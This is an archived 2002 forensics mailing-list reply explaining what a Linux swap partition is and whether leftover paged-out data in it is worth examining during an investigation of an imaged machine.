Hey Rick (and all), The swap partition is a component of the virtual memory system in Unix and Unix-like system. When something doesn't "fit" into the actual RAM the computer has, the operating system can page out individual pages of memory it is not using to the hard disk (specifically to the swap partition). If memory is in particularly high demand and a whole process has been deemed idle, that whole process may be swapped out of the RAM and onto the virtual memory (again, the swap partition). Essentially the swap partition is scratch paper for when memory gets tight. Swap space also has virtually no format as it's state is kept in RAM by the OS. If the computer crashes, the meaning of all those bits on the swap space become meaningless to the computer because the mappings in memory and the CPU are gone. So what of all this can you use? Well, most computer do not wipe or protect the swap partition by zeroing pages on it. This means that *if* a file was swapped or paged out of memory and into virtual memory, then it *might* still be there. In my opinion, swap space is a reasonable route to run down if you are having a hard time with other routes, provided the system is a single user system and you have an idea of what you are looking for. If the system is multi user, you may have a hard time linking some arbitrary bits in the swap partition to a particular user. You need to have an idea of what you are looking for because, well, swap partitions are very big for a human to look at. You need some automation that can flag parts that are interesting. Hope this helps somewhat! I wish I could tell you how to mount and peek around the swap partition, but I don't know the details of it off the top of my head. Sam B. On Wednesday, July 24, 2002, at 02:38 PM, saliskorat_private wrote: > > > New to forensics.... particularly in Unix/Linux... > > I have imaged the partitions on a problematic Linux box, ending up with, > among other things, a swap partition. My question is: > > Is there any value to mounting and analysing a linux swap partition ? I > attempted to mount and received an error, stating that the partition > appeared to be a swap partition - which of course it was. > > If there is value in mounting and analysing, is there a particular -t > parameter for mounting a swap file system? What should I be looking for > once i get it mounted ? > > Thanks in advance for any suggestions or advice. > > Rick > > ----------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Jul 28 2002 - 13:07:56 PDT